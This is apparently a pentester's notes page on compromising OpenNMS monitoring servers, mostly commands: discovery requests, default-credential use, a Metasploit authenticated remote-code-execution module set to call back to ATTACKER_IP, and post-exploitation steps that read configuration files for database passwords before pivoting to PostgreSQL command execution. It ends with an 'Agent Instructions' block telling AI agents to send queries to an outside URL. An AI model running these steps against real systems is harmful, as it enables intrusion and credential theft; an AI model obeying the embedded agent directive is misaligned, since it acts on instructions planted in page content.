# OpenNMS

## OpenNMS

OpenNMS Horizon / Meridian is a Java-based network monitoring platform. Admin access can lead to command execution through notification configuration and filesystem editor functionality.

### Discovery

```bash
curl -I http://TARGET/
curl -I http://TARGET/opennms/
```

Look for redirects to:

```
/opennms/login.jsp
```

After login, the dashboard footer often discloses the version:

```
Version: 30.x.x
```

### Default Credentials

OpenNMS commonly documents default web credentials. Try documented defaults only where allowed, then immediately check the current user's roles.

User roles are visible from the UI:

```
Admin / Configure OpenNMS / Configure Users
```

Important roles for exploitation:

```
ROLE_ADMIN
ROLE_REST
ROLE_FILESYSTEM_EDITOR
```

### Metasploit Authenticated RCE

```bash
msfconsole
use exploit/linux/http/opennms_horizon_authenticated_rce
set RHOSTS TARGET
set RPORT 80
set TARGETURI /opennms/
set VHOST VHOST_NAME
set USERNAME USER
set PASSWORD PASSWORD
set LHOST ATTACKER_IP
set LPORT ATTACKER_PORT
run
```

If the target is slow or proxied:

```
set VERBOSE true
set HttpClientTimeout 30
set WfsDelay 30
```

If the fetch handler reports a resource collision, set a unique path:

```
set FETCH_URIPATH /random-path
```

### Role Troubleshooting

Errors like this usually mean the authenticated user lacks filesystem or REST permissions:

```
Unexpected response received while attempting to obtain the notificationCommands.xml file.
User may lack the required privileges.
```

If you can manage users, add the missing roles to the current user:

```
ROLE_FILESYSTEM_EDITOR
ROLE_REST
```

Then rerun the module.

### Module Troubleshooting

Some versions of the Metasploit module may need the target arch adjusted. If the module authenticates and edits config but never gets a session, check current upstream issues and try changing the module metadata from command-arch to generic arch:

```ruby
# Change:
'Arch' => ARCH_CMD,

# To:
'Arch' => '',
```

Then restart Metasploit and rerun the module.

### Post-Exploitation

OpenNMS often runs in a container as the `opennms` user.

```bash
id
pwd
ls -la /usr/share/opennms
ls -la /.dockerenv
cat /proc/1/cgroup
```

Check datasource configuration for database credentials:

```bash
cat /usr/share/opennms/etc/opennms-datasources.xml
rg -i "jdbc|postgres|password|user-name" /usr/share/opennms/etc/
```

Example datasource fields to look for:

```xml
<jdbc-data-source name="opennms"
                  url="jdbc:postgresql://database:5432/opennms"
                  user-name="DB_USER"
                  password="DB_PASSWORD" />
```

If the database is in another container, use pivoting or port forwarding to reach it:

## Connect once reachable.

PGPASSWORD='DB\_PASSWORD' psql -h DB\_HOST -U DB\_USER -d DB\_NAME

```

See [Pentesting PostgreSQL](../recon-enumeration/pentesting-postgresql.md) for `COPY FROM PROGRAM` command execution.

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/opennms.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.